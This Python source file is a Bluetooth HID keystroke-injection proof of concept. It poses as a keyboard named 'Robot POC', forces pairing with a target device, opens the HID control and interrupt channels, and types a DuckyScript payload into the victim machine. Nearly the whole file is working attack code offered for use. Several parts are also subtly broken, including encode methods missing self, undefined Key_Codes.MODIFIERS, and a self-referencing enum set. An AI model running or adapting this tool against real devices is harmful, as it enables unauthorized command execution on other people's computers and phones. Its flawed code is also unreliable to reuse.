441 lines
14 KiB
Python
441 lines
14 KiB
Python
import binascii
|
|
import bluetooth
|
|
import logging as log
|
|
import sys
|
|
import time
|
|
from multiprocessing import Process
|
|
from pydbus import SystemBus
|
|
from enum import Enum
|
|
|
|
from utils.menu_functions import (main_menu, read_duckyscript,
|
|
run, restart_bluetooth_daemon, get_target_address)
|
|
from utils.register_device import register_hid_profile, agent_loop
|
|
|
|
child_processes = []
|
|
|
|
class ConnectionFailureException(Exception):
|
|
pass
|
|
|
|
class Adapter:
|
|
def __init__(self, iface):
|
|
self.iface = iface
|
|
self.bus = SystemBus()
|
|
self.adapter = self._get_adapter(iface)
|
|
|
|
def _get_adapter(self, iface):
|
|
try:
|
|
return self.bus.get("org.bluez", f"/org/bluez/{iface}")
|
|
except KeyError:
|
|
log.error(f"Unable to find adapter '{iface}', aborting.")
|
|
raise ConnectionFailureException("Adapter not found")
|
|
|
|
def _run_command(self, command):
|
|
result = run(command)
|
|
if result.returncode != 0:
|
|
raise ConnectionFailureException(f"Failed to execute command: {' '.join(command)}. Error: {result.stderr}")
|
|
|
|
def set_property(self, prop, value):
|
|
# Convert value to string if it's not
|
|
value_str = str(value) if not isinstance(value, str) else value
|
|
command = ["sudo", "hciconfig", self.iface, prop, value_str]
|
|
self._run_command(command)
|
|
|
|
# Verify if the property is set correctly
|
|
verify_command = ["hciconfig", self.iface, prop]
|
|
verification_result = run(verify_command)
|
|
if value_str not in verification_result.stdout:
|
|
log.error(f"Unable to set adapter {prop}, aborting. Output: {verification_result.stdout}")
|
|
raise ConnectionFailureException(f"Failed to set {prop}")
|
|
|
|
def power(self, powered):
|
|
self.adapter.Powered = powered
|
|
|
|
def reset(self):
|
|
self.power(False)
|
|
self.power(True)
|
|
|
|
def enable_ssp(self):
|
|
try:
|
|
# Command to enable SSP - the actual command might differ
|
|
# This is a placeholder command and should be replaced with the actual one.
|
|
ssp_command = ["sudo", "hciconfig", self.iface, "sspmode", "1"]
|
|
ssp_result = run(ssp_command)
|
|
if ssp_result.returncode != 0:
|
|
log.error(f"Failed to enable SSP: {ssp_result.stderr}")
|
|
raise ConnectionFailureException("Failed to enable SSP")
|
|
except Exception as e:
|
|
log.error(f"Error enabling SSP: {e}")
|
|
raise
|
|
|
|
class PairingAgent:
|
|
def __init__(self, iface, target_addr):
|
|
self.iface = iface
|
|
self.target_addr = target_addr
|
|
dev_name = "dev_%s" % target_addr.upper().replace(":", "_")
|
|
self.target_path = "/org/bluez/%s/%s" % (iface, dev_name)
|
|
|
|
def __enter__(self):
|
|
try:
|
|
log.debug("Starting agent process...")
|
|
self.agent = Process(target=agent_loop, args=(self.target_path,))
|
|
self.agent.start()
|
|
time.sleep(0.25)
|
|
log.debug("Agent process started.")
|
|
return self
|
|
except Exception as e:
|
|
log.error(f"Error starting agent process: {e}")
|
|
raise
|
|
|
|
def __exit__(self, exc_type, exc_val, exc_tb):
|
|
try:
|
|
log.debug("Terminating agent process...")
|
|
self.agent.kill()
|
|
time.sleep(0.25)
|
|
log.debug("Agent process terminated.")
|
|
except Exception as e:
|
|
log.error(f"Error terminating agent process: {e}")
|
|
raise
|
|
|
|
class L2CAPClient:
|
|
def __init__(self, addr, port):
|
|
self.addr = addr
|
|
self.port = port
|
|
self.connected = False
|
|
self.sock = None
|
|
|
|
def encode_combo_input(*args):
|
|
if not args:
|
|
return bytes([0xA1, 0x01] + [0] * 8) # Empty report for key release
|
|
|
|
# Filter out non-Key_Codes arguments and process
|
|
valid_args = [a for a in args if isinstance(a, Key_Codes)]
|
|
|
|
# Properly sum the values of modifiers
|
|
modifiers = sum(a.value for a in valid_args if a in Key_Codes.MODIFIERS)
|
|
|
|
keycodes = [a.value for a in valid_args if a not in Key_Codes.MODIFIERS]
|
|
keycodes += [0] * (6 - len(keycodes))
|
|
return bytes([0xA1, 0x01, modifiers, 0x00] + keycodes)
|
|
|
|
def encode_keyboard_input(*args):
|
|
keycodes = []
|
|
flags = 0
|
|
for a in args:
|
|
if isinstance(a, Key_Codes):
|
|
keycodes.append(a.value)
|
|
elif isinstance(a, Modifier_Codes):
|
|
flags |= a.value
|
|
assert(len(keycodes) <= 7)
|
|
keycodes += [0] * (7 - len(keycodes))
|
|
report = bytes([0xa1, 0x01, flags, 0x00] + keycodes)
|
|
return report
|
|
|
|
def close(self):
|
|
if self.connected:
|
|
self.sock.close()
|
|
self.connected = False
|
|
self.sock = None
|
|
|
|
def send(self, data):
|
|
if not self.connected:
|
|
log.error("[TX] Not connected")
|
|
return
|
|
|
|
log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}")
|
|
if self.attempt_send(data, 0.1):
|
|
log.debug(f"[TX-{self.port}] Data sent successfully")
|
|
else:
|
|
log.error(f"[TX-{self.port}] ERROR! Timed out sending data")
|
|
|
|
def attempt_send(self, data, timeout):
|
|
start = time.time()
|
|
while time.time() - start < timeout:
|
|
try:
|
|
self.sock.send(data)
|
|
return True
|
|
except bluetooth.btcommon.BluetoothError as ex:
|
|
if ex.errno != 11: # no data available
|
|
raise ex
|
|
time.sleep(0.001)
|
|
except Exception as ex:
|
|
log.error(f"[TX-{self.port}] Exception: {ex}")
|
|
self.connected = False
|
|
return False
|
|
|
|
def recv(self, timeout=0):
|
|
start = time.time()
|
|
while True:
|
|
raw = None
|
|
if not self.connected:
|
|
return None
|
|
if self.sock is None:
|
|
return None
|
|
try:
|
|
raw = self.sock.recv(64)
|
|
if len(raw) == 0:
|
|
self.connected = False
|
|
return None
|
|
log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}")
|
|
except bluetooth.btcommon.BluetoothError as ex:
|
|
if ex.errno != 11: # no data available
|
|
raise ex
|
|
else:
|
|
if (time.time() - start) < timeout:
|
|
continue
|
|
return raw
|
|
|
|
def connect(self, timeout=None):
|
|
log.debug(f"Attempting to connect to {self.addr} on port {self.port}")
|
|
log.debug("connecting to %s on port %d" % (self.addr, self.port))
|
|
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
|
|
sock.settimeout(timeout)
|
|
try:
|
|
sock.connect((self.addr, self.port))
|
|
sock.setblocking(0)
|
|
self.sock = sock
|
|
self.connected = True
|
|
log.debug("SUCCESS! connected on port %d" % self.port)
|
|
except Exception as ex:
|
|
self.connected = False
|
|
log.error("ERROR connecting on port %d: %s" % (self.port, ex))
|
|
raise ConnectionFailureException(f"Connection failure on port {self.port}")
|
|
|
|
return self.connected
|
|
|
|
def send_keyboard_report(self, *args):
|
|
self.send(self.encode_keyboard_input(*args))
|
|
|
|
def send_keypress(self, *args, delay=0.05):
|
|
if args:
|
|
log.debug(f"Attempting to send... {args}")
|
|
self.send(self.encode_keyboard_input(*args))
|
|
else:
|
|
# If no arguments, send an empty report to release keys
|
|
self.send(self.encode_keyboard_input())
|
|
time.sleep(delay)
|
|
|
|
def send_combination(self, *keys, delay=0.05):
|
|
"""
|
|
Send a combination of keys, which can include modifiers and regular keys.
|
|
"""
|
|
modifiers = 0
|
|
regular_keys = []
|
|
|
|
for key in keys:
|
|
if key in Key_Codes.MODIFIERS:
|
|
modifiers |= key.value
|
|
else:
|
|
regular_keys.append(key.value)
|
|
|
|
# Ensure that no more than 6 regular keys are sent
|
|
regular_keys = regular_keys[:6] + [0] * (6 - len(regular_keys))
|
|
|
|
# Create the HID report and send it
|
|
report = bytes([0xa1, 0x01, modifiers, 0x00] + regular_keys)
|
|
self.send(report)
|
|
time.sleep(delay)
|
|
|
|
# Send an empty report to release the keys
|
|
self.send(self.encode_combo_input())
|
|
|
|
class L2CAPConnectionManager:
|
|
def __init__(self, target_address):
|
|
self.target_address = target_address
|
|
self.clients = {}
|
|
|
|
def create_connection(self, port):
|
|
client = L2CAPClient(self.target_address, port)
|
|
self.clients[port] = client
|
|
return client
|
|
|
|
def connect_all(self):
|
|
try:
|
|
return sum(client.connect() for client in self.clients.values())
|
|
except ConnectionFailureException as e:
|
|
log.error(f"Connection failure: {e}")
|
|
raise
|
|
|
|
def close_all(self):
|
|
for client in self.clients.values():
|
|
client.close()
|
|
|
|
def terminate_child_processes():
|
|
for proc in child_processes:
|
|
if proc.is_alive():
|
|
proc.terminate()
|
|
proc.join()
|
|
|
|
def setup_bluetooth(target_address):
|
|
restart_bluetooth_daemon()
|
|
profile_proc = Process(target=register_hid_profile, args=('hci0', target_address))
|
|
profile_proc.start()
|
|
child_processes.append(profile_proc)
|
|
adapter = Adapter('hci0')
|
|
adapter.set_property("name", "Robot POC")
|
|
adapter.set_property("class", 0x002540)
|
|
adapter.power(True)
|
|
return adapter
|
|
|
|
# Key codes for modifier keys
|
|
class Modifier_Codes(Enum):
|
|
LEFTCONTROL = 0xe0
|
|
LEFTSHIFT = 0xe1
|
|
LEFTALT = 0xe2
|
|
LEFTGUI = 0xe3
|
|
RIGHTCONTROL = 0xe4
|
|
RIGHTSHIFT = 0xe5
|
|
RIGHTALT = 0xe6
|
|
RIGHTGUI = 0xe7
|
|
|
|
# Convenience mappings for common names
|
|
CTRL = LEFTCONTROL
|
|
ALT = LEFTALT
|
|
SHIFT = LEFTSHIFT
|
|
GUI = LEFTGUI
|
|
|
|
# Modifier Key Set for easy checking
|
|
MODIFIER_KEYS_SET = {Modifier_Codes.LEFTCONTROL, Modifier_Codes.LEFTSHIFT, Modifier_Codes.LEFTALT, Modifier_Codes.LEFTGUI,
|
|
Modifier_Codes.RIGHTCONTROL, Modifier_Codes.RIGHTSHIFT, Modifier_Codes.RIGHTALT, Modifier_Codes.RIGHTGUI}
|
|
|
|
class Key_Codes(Enum):
|
|
NONE = 0x00
|
|
A = 0x04
|
|
B = 0x05
|
|
C = 0x06
|
|
D = 0x07
|
|
E = 0x08
|
|
F = 0x09
|
|
G = 0x0a
|
|
H = 0x0b
|
|
I = 0x0c
|
|
J = 0x0d
|
|
K = 0x0e
|
|
L = 0x0f
|
|
M = 0x10
|
|
N = 0x11
|
|
O = 0x12
|
|
P = 0x13
|
|
Q = 0x14
|
|
R = 0x15
|
|
S = 0x16
|
|
T = 0x17
|
|
U = 0x18
|
|
V = 0x19
|
|
W = 0x1a
|
|
X = 0x1b
|
|
Y = 0x1c
|
|
Z = 0x1d
|
|
_1 = 0x1e
|
|
_2 = 0x1f
|
|
_3 = 0x20
|
|
_4 = 0x21
|
|
_5 = 0x22
|
|
_6 = 0x23
|
|
_7 = 0x24
|
|
_8 = 0x25
|
|
_9 = 0x26
|
|
_0 = 0x27
|
|
ENTER = 0x28
|
|
ESCAPE = 0x29
|
|
BACKSPACE = 0x2a
|
|
TAB = 0x2b
|
|
SPACE = 0x2c
|
|
MINUS = 0x2d
|
|
EQUAL = 0x2e
|
|
LEFTBRACE = 0x2f
|
|
RIGHTBRACE = 0x30
|
|
BACKSLASH = 0x31
|
|
SEMICOLON = 0x33
|
|
QUOTE = 0x34
|
|
BACKTICK = 0x35
|
|
COMMA = 0x36
|
|
DOT = 0x37
|
|
SLASH = 0x38
|
|
CAPSLOCK = 0x39
|
|
|
|
def process_duckyscript(client, duckyscript):
|
|
client.send_keypress('') # Send empty report
|
|
time.sleep(0.5)
|
|
|
|
for line in duckyscript:
|
|
line = line.strip()
|
|
if not line or line.startswith("REM"):
|
|
continue # Skip empty lines and comments
|
|
|
|
if line.startswith("STRING"):
|
|
text = line[7:]
|
|
for letter in text:
|
|
try:
|
|
# Use upper() to match the uppercase keys defined in Key_Codes
|
|
key_code = getattr(Key_Codes, letter.upper()) if letter != " " else Key_Codes.SPACE
|
|
client.send_keypress(key_code)
|
|
client.send_keypress()
|
|
time.sleep(0.05) # Add a small delay between keypresses
|
|
except AttributeError:
|
|
log.warning(f"Unsupported character '{letter}' in Duckyscript")
|
|
|
|
elif line.startswith("GUI"):
|
|
# Handle combination keys
|
|
components = line.split()
|
|
try:
|
|
# Use Modifier_Codes for modifier keys
|
|
modifier = getattr(Modifier_Codes, components[0].upper())
|
|
for key in components[1:]:
|
|
# Use Key_Codes for regular keys
|
|
key_code = getattr(Key_Codes, key.upper(), None)
|
|
if key_code:
|
|
client.send_combination(modifier, key_code)
|
|
client.send_combination() # Release keys
|
|
except AttributeError:
|
|
log.warning(f"Unsupported key or modifier in line: {line}")
|
|
|
|
def initialize_pairing(agent_iface, target_address):
|
|
try:
|
|
with PairingAgent(agent_iface, target_address) as agent:
|
|
log.debug("Pairing agent initialized")
|
|
except Exception as e:
|
|
log.error(f"Failed to initialize pairing agent: {e}")
|
|
raise ConnectionFailureException("Pairing agent initialization failed")
|
|
|
|
def establish_connections(connection_manager):
|
|
if not connection_manager.connect_all():
|
|
raise ConnectionFailureException("Failed to connect to all required ports")
|
|
|
|
# Main function
|
|
def main():
|
|
log.basicConfig(level=log.DEBUG)
|
|
main_menu()
|
|
target_address = get_target_address()
|
|
if not target_address:
|
|
log.info("No target address provided. Exiting.")
|
|
return
|
|
|
|
duckyscript = read_duckyscript()
|
|
if not duckyscript:
|
|
log.info("Payload file not found. Exiting.")
|
|
return
|
|
|
|
adapter = setup_bluetooth(target_address)
|
|
adapter.enable_ssp()
|
|
|
|
try:
|
|
connection_manager = L2CAPConnectionManager(target_address)
|
|
connection_manager.create_connection(1) # SDP
|
|
connection_manager.create_connection(17) # HID Control
|
|
connection_manager.create_connection(19) # HID Interrupt
|
|
|
|
initialize_pairing('hci0', target_address)
|
|
establish_connections(connection_manager)
|
|
hid_interrupt_client = connection_manager.clients[19]
|
|
process_duckyscript(hid_interrupt_client, duckyscript)
|
|
except ConnectionFailureException as e:
|
|
log.error(f"Connection failure: {e}")
|
|
terminate_child_processes()
|
|
sys.exit("Exiting script due to connection failure")
|
|
|
|
if __name__ == "__main__":
|
|
try:
|
|
main()
|
|
finally:
|
|
terminate_child_processes()
|